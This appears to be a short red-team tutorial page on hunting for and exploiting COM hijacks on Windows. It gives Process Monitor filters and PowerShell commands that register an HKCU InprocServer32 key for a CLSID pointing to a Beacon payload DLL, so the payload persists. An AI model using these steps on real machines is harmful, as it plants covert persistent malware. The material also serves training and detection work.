Hunting for COM Hijacks
- Look for hijackable COM components with Process Monitor:
Launch procmon64.exe on Attacker Desktop.
Due to the sheer number of events generated, filtering is essential to find the ones of interest. We're looking for:
RegOpenKey operations.
where the Result is NAME NOT FOUND.
and the Path ends with InprocServer32.
To speed the collection up you click random things, go into the Windows menu, launch applications etc.
One aspect to look out for is the number of times a particular CLSID is loaded. If you hijack one that is loaded every couple of seconds, you're going to have a rough time - so it's well worth the additional effort to find one that's loaded semi-frequently but not so much so or loaded when a commonly used application (Word, Excel, Outlook, etc) is opened.
Pick out a CLSID and check if that entry exists in HKLM, but not in HKCU or viceversa. Example:
Get-Item -Path "HKLM:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
To exploit this, we can create the necessary registry entries in HKCU and point them at a Beacon DLL. Example:
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
To clean-up a COM hijack, simply remove the registry entries from HKCU and delete the DLL.
- Look for hijackable COM components is in the Task Scheduler:
We can use the following PowerShell to find compatible tasks.
Last updated